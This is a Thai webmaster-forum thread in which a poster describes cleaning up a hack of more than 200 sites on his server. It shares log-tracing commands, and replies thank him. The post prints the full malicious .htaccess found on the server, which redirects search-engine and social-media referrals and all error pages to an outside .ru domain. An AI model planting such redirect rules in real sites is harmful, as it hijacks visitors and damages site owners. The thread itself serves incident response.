ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comความรู้ทั่วไปGeneral (ถามคุยวิชาการ IM)วิธีแก้ เมื่อโดน Hack .htaccess ให้ Redirect ไปเว็บปลายทางครับ
หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: วิธีแก้ เมื่อโดน Hack .htaccess ให้ Redirect ไปเว็บปลายทางครับ  (อ่าน 6765 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
zalapaonet
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 87
ออฟไลน์ ออฟไลน์

กระทู้: 1,229



ดูรายละเอียด เว็บไซต์
« เมื่อ: 23 ธันวาคม 2011, 17:59:30 »

** ออกตัวก่อนว่า เป็นแค่ 1 วิธี ที่ผมได้ลองหาต้นตอ เพื่อแก้แล้ว หายนะครับ ไม่ได้เก่งอะไร ^___^ " **


หลังจากเมื่อสองวันก่อน search keyword ที่นั่งปั่นอยู่ดีๆ แล้วเกิดอาการ กดเข้าไปที่เว้บตัวเอง แต่ดันเด้งไปเว็บอื่นซะงั้น
ให้ตายซิ มันเป็นเพราะอะไร .. ไม่ชักช้า จากประสบการ ไอ้การ Redirect นี่ ไม่โดนฝัง .htaccess ก็ โดนยัด index.php แน่ๆ
นั่งงมอยู่พักใหญ่ ได้ความว่า ตูโดนเขียนไฟล์ .htaccess

โค๊ด:
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://hereadmin.ru/kernel/index.php [R=301,L]
</IfModule>

ErrorDocument 400 http://hereadmin.ru/kernel/index.php
ErrorDocument 401 http://hereadmin.ru/kernel/index.php
ErrorDocument 403 http://hereadmin.ru/kernel/index.php
ErrorDocument 404 http://hereadmin.ru/kernel/index.php
ErrorDocument 500 http://hereadmin.ru/kernel/index.php

จับใจความได้ว่า .. ไม่ว่าผู้เข้าชม จะเข้าเว็บเรามาจากหนทางใด ไม่ว่าจะเป็น Google หรือ Search Engine ชื่อดังต่างๆ รวมไปถึงการแปะลิ้งไว้ที่ Facebook ผู้เข้าชมเหล่านั้น จะถูกย้ายไป เว็บปลายทางทันที
ยกเว้น พิมพ์เข้าตรงๆ หรือ มาจาก Bookmark

สิ่งแรกที่ทำคือ .. ลบมันออก แล้วทับด้วยของเก่า .. ผลคือไม่หายหรอก ให้ตายซิ Hacker มันไม่ได้โง่ขนาดนั้นนะ เห่อๆ
และที่สำคัญ กว่า 200 โดเมน บน Server มันเขียนไว้หมด

หลังจากที่หาวิธีแก้เองไม่ได้ ก็เลยต้องหาตัวช่วยใน TSB นี่แหล่ะ ตามกระทู้ด้านล่างนี้ ที่มีอาการใกล้เคียงกัน
http://www.thaiseoboard.com/index.php?topic=249004.0
http://www.thaiseoboard.com/index.php?topic=196996.0
http://www.thaiseoboard.com/index.php?topic=181380.0

แต่ว่า .. ก็ยังไม่ได้คำตอบ

เมื่อไม่ได้คำตอบ ก็หาต่อไป

หาต่อไป

หลังจากทั้ง find ทั้ง grep ทั้ง เช็ค log apache อยู่ 2 วันเต็มๆ เว็บที่ indexed ไปแล้ว เริ่มเกิดอาการหน้าแดง warning จาก google
ก็มาค้นพบ ไฟล์ๆ นึง มาอยู่ในที่ที่ไม่ควรมาอยู่ ใน root ของ vhost (ไม่ใช่ root ของ www นะ)

ก็ vi เข้าไปดู นั่นไง เต็มๆ ไม่ต้องอ่านออก ก็รู้ว่า script malware ชัดๆ ไม่รีรอที่จะ copy เก็บไว้ให้ฝ่ายนิติวิทยาศาสตร์ ตรวจ แล้ว rm ออกทันที

หลังจากรอดูผลอยู่ครู่ใหญ่ๆ ไม่มีการกระทำใดๆ ที่ผิดปกติแล้ว ... รอดแล้ว ... เตรียมไปฉลองปีใหม่ อย่างมีความสุขได้แล้วล่ะ

ก็เลยอยากจะเอามาแชร์ให้เพื่อนๆ  ในบอร์ดได้เป็นแนวทางในการค้นหา ต้นตอของปัญหา เพื่อเป็นอีก 1 หนทาง เผื่อจะฟลุ๊ค แก้ได้อย่างผมครับ

ผมจะลงพวกคำสั่ง และวิธีการต่างๆ ที่ผมลองใช้ จนเจอ และแก้ไขปัญหาได้ ไว้ด้านล่างนี้ครับ หวังว่า น่าจะช่วยได้บ้าง ไม่มากก็น้อยครับ

โค๊ด:
find -name ".htaccess" /{root paht}
คำสั่งนี้ ใช้ค้นหา .htaccess ที่อยู่บน root www ทั้งหมดครับ หาเจอแล้วลองดูว่า ใน .htaccess นั้นมี script แปลกๆ มั้ย ถ้ามีก็ลบออกครับ
รอซักพัก ถ้ามันเขียนขึ้นมาใหม่ แบบเดิม ก็แสดงว่า โดนแล้วละครับ

หลังจากนั้น
โค๊ด:
ls -l 
หรือคำสั่งอื่น เพื่อเช็คว่าไฟล์ .htaccess นั้นถูกสร้างขึ้นเมื่อเวลาเท่าไหร่

โค๊ด:
grep -r "{วันเวลาที่เช็คได้}" /{log directory}
ใช้คำสั่ง grep -r โดยระบุ วันเวลา ตาม format ของ log file เพื่อค้นหา record ในเวลานั้นๆ ขึ้นมาวิเคราะห์ครับ

ตัวอย่างของผม คือ ในเวลา ที่ผมตรวจเจอนั้น มีการเรียกใช้จากคำสั่ง POST จาก โดเมนนึงในระบบ
ผมจึงรู้ว่า มันไปเรียกไฟล์อะไรขึ้นมาทำงาน เมื่อรู้อย่างนั้นแล้ว ผมก็ find -name เจ้าไฟล์ปัญหานั้น จนเจอ และลบทิ้งไปครับ

เรื่องราวก็มีอยู่ประมาณนี้ครับ ใครที่เจอเหมือนกัน ก็ลองดูหลายๆ วิธีนะครับ หรือมีวิธีอื่นที่แก้ไขได้ ก็นำมาแชร์กันนะครับ


ขอบคุณครับ

« แก้ไขครั้งสุดท้าย: 23 ธันวาคม 2011, 18:01:04 โดย zalapaonet » บันทึกการเข้า

daipob
คนรักเสียว
*

พลังน้ำใจ: 6
ออฟไลน์ ออฟไลน์

กระทู้: 142



ดูรายละเอียด เว็บไซต์
« ตอบ #1 เมื่อ: 23 ธันวาคม 2011, 18:15:31 »

เยี่ยมมากครับ..  ขอบคุณที่แนะวิธีแก้ไว้ด้วยครับ wanwan017
บันทึกการเข้า

siamseo
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 168
ออฟไลน์ ออฟไลน์

กระทู้: 3,308



ดูรายละเอียด
« ตอบ #2 เมื่อ: 23 ธันวาคม 2011, 18:16:26 »

ขอบคุณมากครับ  wanwan017
บันทึกการเข้า

มาส่องมาลอง
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 178
ออฟไลน์ ออฟไลน์

กระทู้: 2,280



ดูรายละเอียด เว็บไซต์
« ตอบ #3 เมื่อ: 23 ธันวาคม 2011, 19:55:22 »

ขอบคุณครับ โดนประจำเลย wp มันชอบไปแก้ permission ของ index.php เป็น 0000 แล้วเว็บก็ดับ ไม่รู้ว่าจะช่วยได้ป่าวคร้าบ  Tongue
บันทึกการเข้า

กำลังเอาใจช่วย adyim.com wanwan015 เว็บนี้เอาไว้ทำอะไรครับSEO
เดี่ยวนี้เรื่องกฎในลายเซ้นถูกละเลยทั้งสูงเกินบ้างพาไป18+บ้างผมคิดมากไปม้าง
Tuckery
ก๊วนเสียว
*

พลังน้ำใจ: 7
ออฟไลน์ ออฟไลน์

กระทู้: 245



ดูรายละเอียด
« ตอบ #4 เมื่อ: 23 ธันวาคม 2011, 20:03:29 »

น่ากลัวนะ  Tongue
บันทึกการเข้า
DOITJOB
ก๊วนเสียว
*

พลังน้ำใจ: 29
ออฟไลน์ ออฟไลน์

กระทู้: 231



ดูรายละเอียด
« ตอบ #5 เมื่อ: 23 ธันวาคม 2011, 20:35:56 »

ขอบคุณมากครับ
บันทึกการเข้า
loidara
ก๊วนเสียว
*

พลังน้ำใจ: 16
ออฟไลน์ ออฟไลน์

กระทู้: 262



ดูรายละเอียด
« ตอบ #6 เมื่อ: 23 ธันวาคม 2011, 20:43:28 »

โค้ดคำสั่งต่างๆ ไปพิมพ์ใส่ที่ไหนครับ ใช้ไม่เป็นครับ ขอบคุณครับ  wanwan017
บันทึกการเข้า
zalapaonet
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 87
ออฟไลน์ ออฟไลน์

กระทู้: 1,229



ดูรายละเอียด เว็บไซต์
« ตอบ #7 เมื่อ: 23 ธันวาคม 2011, 20:50:17 »

ขอบคุณครับ โดนประจำเลย wp มันชอบไปแก้ permission ของ index.php เป็น 0000 แล้วเว็บก็ดับ ไม่รู้ว่าจะช่วยได้ป่าวคร้าบ  Tongue

หลักการคล้ายๆ กันครับ ดูวันที่อัปเดตไฟล์ แล้วเอาวันที่ไป search ใน log file ครับ ดูที่ใกล้เคียง แล้วก็จัดการได้เลยครับ

 wanwan003
บันทึกการเข้า

zalapaonet
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 87
ออฟไลน์ ออฟไลน์

กระทู้: 1,229



ดูรายละเอียด เว็บไซต์
« ตอบ #8 เมื่อ: 23 ธันวาคม 2011, 20:50:49 »

โค้ดคำสั่งต่างๆ ไปพิมพ์ใส่ที่ไหนครับ ใช้ไม่เป็นครับ ขอบคุณครับ  wanwan017

ต้อง ssh เข้าไปที่ server ครับ
บันทึกการเข้า

loidara
ก๊วนเสียว
*

พลังน้ำใจ: 16
ออฟไลน์ ออฟไลน์

กระทู้: 262



ดูรายละเอียด
« ตอบ #9 เมื่อ: 23 ธันวาคม 2011, 21:05:09 »

โค้ดคำสั่งต่างๆ ไปพิมพ์ใส่ที่ไหนครับ ใช้ไม่เป็นครับ ขอบคุณครับ  wanwan017

ต้อง ssh เข้าไปที่ server ครับ

ขอบคุณครับ ว่าจะมาถามต่อว่า ssh คืออะไร พอดีไป search ดูก่อน เจอวิธีใช้แล้วครับ ..   wanwan017
บันทึกการเข้า
มาส่องมาลอง
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 178
ออฟไลน์ ออฟไลน์

กระทู้: 2,280



ดูรายละเอียด เว็บไซต์
« ตอบ #10 เมื่อ: 23 ธันวาคม 2011, 21:09:27 »

ขอบคุณครับ โดนประจำเลย wp มันชอบไปแก้ permission ของ index.php เป็น 0000 แล้วเว็บก็ดับ ไม่รู้ว่าจะช่วยได้ป่าวคร้าบ  Tongue

หลักการคล้ายๆ กันครับ ดูวันที่อัปเดตไฟล์ แล้วเอาวันที่ไป search ใน log file ครับ ดูที่ใกล้เคียง แล้วก็จัดการได้เลยครับ

 wanwan003

 wanwan020 Thanks  แล้วนะครับท่าน
บันทึกการเข้า

กำลังเอาใจช่วย adyim.com wanwan015 เว็บนี้เอาไว้ทำอะไรครับSEO
เดี่ยวนี้เรื่องกฎในลายเซ้นถูกละเลยทั้งสูงเกินบ้างพาไป18+บ้างผมคิดมากไปม้าง
Meen2007
สมุนแก๊งเสียว
*

พลังน้ำใจ: 123
ออฟไลน์ ออฟไลน์

กระทู้: 573



ดูรายละเอียด เว็บไซต์
« ตอบ #11 เมื่อ: 23 ธันวาคม 2011, 21:15:23 »

ขอบคุณครับ  wanwan017
บันทึกการเข้า

เกมส์เกมส์.com
Verified Seller
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 322
ออฟไลน์ ออฟไลน์

กระทู้: 4,122



ดูรายละเอียด เว็บไซต์
« ตอบ #12 เมื่อ: 23 ธันวาคม 2011, 21:44:48 »

เว็บที่โดนคำสั่งนี้ ถ้าเจ้าของไม่ค่อยมีเวลาเช็ค หรือเข้าเว้บตัวเอง เว็บอาจโดนแบนไปเลยครับ เว็บคุณภาพผมเคยโดน ทำนองนี้ บางอันไม่ได้รีไดเรก จะรีไดเรกแค่ bot จากการแทรก .htaccess และเคาะไปไว้ล่างๆ ถ้าไม่สังเกตุจะไม่เห็น
บันทึกการเข้า

jatuponmeepon3
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 79
ออฟไลน์ ออฟไลน์

กระทู้: 1,151



ดูรายละเอียด เว็บไซต์
« ตอบ #13 เมื่อ: 23 ธันวาคม 2011, 22:04:42 »

ขอบคุณครับ
บันทึกการเข้า

zalapaonet
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 87
ออฟไลน์ ออฟไลน์

กระทู้: 1,229



ดูรายละเอียด เว็บไซต์
« ตอบ #14 เมื่อ: 24 ธันวาคม 2011, 03:45:57 »

เว็บที่โดนคำสั่งนี้ ถ้าเจ้าของไม่ค่อยมีเวลาเช็ค หรือเข้าเว้บตัวเอง เว็บอาจโดนแบนไปเลยครับ เว็บคุณภาพผมเคยโดน ทำนองนี้ บางอันไม่ได้รีไดเรก จะรีไดเรกแค่ bot จากการแทรก .htaccess และเคาะไปไว้ล่างๆ ถ้าไม่สังเกตุจะไม่เห็น



เป็นเช่นนั้นจริงๆ ครับ ของผมนี่ เคาะ tab ไปจนสุดหน้าจอเลย ไม่สังเกตุ ไม่เห็นเลยจริงๆ  Cry
บันทึกการเข้า

dmax
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 132
ออฟไลน์ ออฟไลน์

กระทู้: 1,182



ดูรายละเอียด
« ตอบ #15 เมื่อ: 24 ธันวาคม 2011, 03:53:24 »

+1 ไป งาม ๆ
บันทึกการเข้า
zalapaonet
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 87
ออฟไลน์ ออฟไลน์

กระทู้: 1,229



ดูรายละเอียด เว็บไซต์
« ตอบ #16 เมื่อ: 24 ธันวาคม 2011, 08:21:15 »

+1 ไป งาม ๆ

ขอบคุณครับ
บันทึกการเข้า

kcobra
ก๊วนเสียว
*

พลังน้ำใจ: 41
ออฟไลน์ ออฟไลน์

กระทู้: 494



ดูรายละเอียด เว็บไซต์
« ตอบ #17 เมื่อ: 17 มกราคม 2012, 16:23:22 »

+1 ขอบคุณมาก เพิ่งโดนไปหมาดๆ
บันทึกการเข้า
หน้า: [1]   ขึ้นบน
พิมพ์